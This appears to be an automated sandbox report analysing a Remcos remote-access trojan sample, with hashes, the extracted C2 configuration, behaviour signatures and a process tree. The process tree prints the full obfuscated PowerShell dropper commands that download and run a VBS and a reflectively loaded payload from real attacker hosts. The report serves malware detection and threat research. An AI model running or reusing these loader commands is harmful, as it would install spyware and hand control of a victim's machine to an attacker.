Analysis

  • max time kernel
    149s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 06:11

General

  • Target

    creamkissingthingswithcreambananapackagecreamy.hta

  • Size

    80KB

  • MD5

    049640aa09b45f8f374ec9fff6e272e5

  • SHA1

    ca0990ea3db24491c5a5ce408b921383b0d74db8

  • SHA256

    277bce05fe87b2c2edd725dc6bc75c98a9f3d3fc68159a65471625009fe0e9e7

  • SHA512

    044cc9e601d6809ae166a99c91656b54fc602d088edba57013f2575ebe2e2dd0200e29335494977479a5ed04d81313d5b4816a7ec419e14df95f773133c9a7cc

  • SSDEEP

    768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHA/OxlbVxP7iZ5VQSG/wa3s+RP7i2dfwwwAkKD:tk

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

C2

newglobalfucntioninside.duckdns.org:14646

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PVMSPM

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creamkissingthingswithcreambananapackagecreamy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:224
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1212
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3496
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\za50bhch\za50bhch.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2136
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD244.tmp" "c:\Users\Admin\AppData\Local\Temp\za50bhch\CSC653BE66B84E24CE2AA3DADDAD9FF5D64.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2460
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2692
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4736
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2356

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    19KB

    MD5

    5fe60c342148ac2642c25c6e0a4219d6

    SHA1

    25e240613a209c65d0d36d2048dbd7f4705a30a8

    SHA256

    56241b0a710dae53b15f626c965116bb3dda4a3cb3ff253131f1c535fe619b52

    SHA512

    7de7499eee95ad728958d9e1556a1d155c06877b9604d67f981013afd7ef60bd3a8ad02af58e8b0562fd2a1341d1bd1c46b88ace5c4d7aff6944971ed56cb624

  • C:\Users\Admin\AppData\Local\Temp\RESD244.tmp

    Filesize

    1KB

    MD5

    ae71ea060936cf68374ad5408bec6f2b

    SHA1

    39ef44aedf7af770f34366e525218f74c33dfa7e

    SHA256

    07204d89adda7f1dbc2711df75340c2490aa1fc8f0f582337694b374f0e6a43a

    SHA512

    0265ffb2afd18ca731cbae01eb33128f3bb4a8fb2afa8265d81ebab29c90d758fac99d87ace749576469a3b1bb57ccf02b169955e1e0c2a0eb7903b4d4cf53b5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_41dvpjgy.i2l.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\za50bhch\za50bhch.dll

    Filesize

    3KB

    MD5

    be9201f45796648975e218ede1ee7812

    SHA1

    dfb1a62c234b292215603a7919fcd97f4ea3113b

    SHA256

    ed97fd387eaaec8824ff4af5dd8269021606cf7163a3816317393f36097bb7b0

    SHA512

    563aed8a5ca24a03379a224f61842b7fda85da6c57e21e9a9ba159a37eee3a99da7f5f9520f4c53e7a4b01cad5c8d409e53e3c1959372eee09c66badca9f64df

  • C:\Users\Admin\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS

    Filesize

    150KB

    MD5

    716d2edd830102bbbad2cb0a1a0259f1

    SHA1

    720d2db1e6c8162f89376d06f149237ad8269297

    SHA256

    5a110b1e0b3424a297618863ffa88a2de1f09c266687f93da8e3d7c6dab48341

    SHA512

    edc3624e8071e058981bf47598b654321846a4538d4f64826457108431584021ca901c16278ab74775ef64a377387427a03cd4592b711f624c463bcdb53986ca

  • \??\c:\Users\Admin\AppData\Local\Temp\za50bhch\CSC653BE66B84E24CE2AA3DADDAD9FF5D64.TMP

    Filesize

    652B

    MD5

    62b28fe0faa5654c1b768bc48a7ed793

    SHA1

    992f5016c97546db60c2127359ceb5fbe5ceb196

    SHA256

    fb624897a833199aaf16517570559947e7b422e3a2c7a97e126c23ba763060da

    SHA512

    6638fead518a696be5041bcc7ef9ff18a4fe9bbd666d872447eea79b14979b91dfcb6f805ad76b36f6365357f5c30a0eb1c9f47f1637e71648a936f6555bd16d

  • \??\c:\Users\Admin\AppData\Local\Temp\za50bhch\za50bhch.0.cs

    Filesize

    484B

    MD5

    48060b02d61c7c41db2a78dd5ba30307

    SHA1

    7064e1187a73995e4b916ac3d594014d9938a13d

    SHA256

    12c2558ddddb21359a0a88e1e7bdd1b2c28cb56435c4f9d9796161a2f60b7be7

    SHA512

    e522f64e687f3ba212703d2b8b5e0320e806359eb16a4fa21d08d5e27e858c82a88aabd01b82a816b96378c15013371451366e1a586e13a132dc7d0d2a86f46c

  • \??\c:\Users\Admin\AppData\Local\Temp\za50bhch\za50bhch.cmdline

    Filesize

    369B

    MD5

    6ee006eea13ce078b8db9493cb2bcedb

    SHA1

    0a967ae55dcfd9b4388c60f52dc1b9a072ae8aa2

    SHA256

    d6c2ba31984de0f7a2c5cfc9a5da0803f8694b4d2006f1103b0b428382f7ca73

    SHA512

    3f95c57ef42b2e7949ca0c05ecfd0f18653b840a7a9c61a879c74f3f12683c5ebebd585f3d985be5cb5d6db7c3c55830e02bf8bc173b1ac5afe6429233b730c7

  • memory/2356-123-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-122-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-149-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-99-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-148-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-147-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-146-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-100-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-145-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-144-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-143-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-142-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-141-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-140-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-139-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-138-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-137-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-136-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-135-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-134-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-133-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-132-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-131-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-130-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-129-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-128-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-127-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-126-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-125-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-101-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-124-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-115-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-121-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-120-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-119-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-85-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-86-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-88-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-89-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-90-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-91-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-92-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-93-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-94-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-95-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-96-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-97-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-98-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-118-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-117-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-116-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-102-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-103-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-104-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-105-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-106-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-107-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-108-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-109-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-110-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-111-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-112-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-113-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2356-114-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/3496-58-0x00000000079D0000-0x00000000079D8000-memory.dmp

    Filesize

    32KB

  • memory/3496-5-0x0000000005D20000-0x0000000005D86000-memory.dmp

    Filesize

    408KB

  • memory/3496-33-0x00000000073D0000-0x00000000073EE000-memory.dmp

    Filesize

    120KB

  • memory/3496-21-0x000000006D460000-0x000000006D4AC000-memory.dmp

    Filesize

    304KB

  • memory/3496-19-0x0000000006420000-0x000000000646C000-memory.dmp

    Filesize

    304KB

  • memory/3496-20-0x0000000007390000-0x00000000073C2000-memory.dmp

    Filesize

    200KB

  • memory/3496-1-0x0000000002E00000-0x0000000002E36000-memory.dmp

    Filesize

    216KB

  • memory/3496-22-0x0000000070BA0000-0x0000000071350000-memory.dmp

    Filesize

    7.7MB

  • memory/3496-0-0x0000000070BAE000-0x0000000070BAF000-memory.dmp

    Filesize

    4KB

  • memory/3496-2-0x0000000070BA0000-0x0000000071350000-memory.dmp

    Filesize

    7.7MB

  • memory/3496-3-0x00000000056F0000-0x0000000005D18000-memory.dmp

    Filesize

    6.2MB

  • memory/3496-65-0x0000000070BA0000-0x0000000071350000-memory.dmp

    Filesize

    7.7MB

  • memory/3496-64-0x0000000070BAE000-0x0000000070BAF000-memory.dmp

    Filesize

    4KB

  • memory/3496-18-0x00000000063F0000-0x000000000640E000-memory.dmp

    Filesize

    120KB

  • memory/3496-4-0x0000000005320000-0x0000000005342000-memory.dmp

    Filesize

    136KB

  • memory/3496-7-0x0000000070BA0000-0x0000000071350000-memory.dmp

    Filesize

    7.7MB

  • memory/3496-6-0x0000000005D90000-0x0000000005DF6000-memory.dmp

    Filesize

    408KB

  • memory/3496-70-0x0000000070BA0000-0x0000000071350000-memory.dmp

    Filesize

    7.7MB

  • memory/3496-17-0x0000000005E00000-0x0000000006154000-memory.dmp

    Filesize

    3.3MB

  • memory/3496-45-0x00000000079D0000-0x00000000079D8000-memory.dmp

    Filesize

    32KB

  • memory/3496-44-0x00000000079E0000-0x00000000079FA000-memory.dmp

    Filesize

    104KB

  • memory/3496-43-0x00000000079A0000-0x00000000079B4000-memory.dmp

    Filesize

    80KB

  • memory/3496-42-0x0000000007990000-0x000000000799E000-memory.dmp

    Filesize

    56KB

  • memory/3496-41-0x0000000007960000-0x0000000007971000-memory.dmp

    Filesize

    68KB

  • memory/3496-40-0x0000000007A00000-0x0000000007A96000-memory.dmp

    Filesize

    600KB

  • memory/3496-39-0x00000000077E0000-0x00000000077EA000-memory.dmp

    Filesize

    40KB

  • memory/3496-38-0x0000000007770000-0x000000000778A000-memory.dmp

    Filesize

    104KB

  • memory/3496-37-0x0000000007DC0000-0x000000000843A000-memory.dmp

    Filesize

    6.5MB

  • memory/3496-36-0x0000000070BA0000-0x0000000071350000-memory.dmp

    Filesize

    7.7MB

  • memory/3496-35-0x0000000007690000-0x0000000007733000-memory.dmp

    Filesize

    652KB

  • memory/3496-34-0x0000000070BA0000-0x0000000071350000-memory.dmp

    Filesize

    7.7MB

  • memory/3496-23-0x000000006D7D0000-0x000000006DB24000-memory.dmp

    Filesize

    3.3MB

  • memory/4736-81-0x0000000006160000-0x00000000064B4000-memory.dmp

    Filesize

    3.3MB

  • memory/4736-83-0x0000000007B70000-0x0000000007CC8000-memory.dmp

    Filesize

    1.3MB

  • memory/4736-84-0x0000000007CD0000-0x0000000007D6C000-memory.dmp

    Filesize

    624KB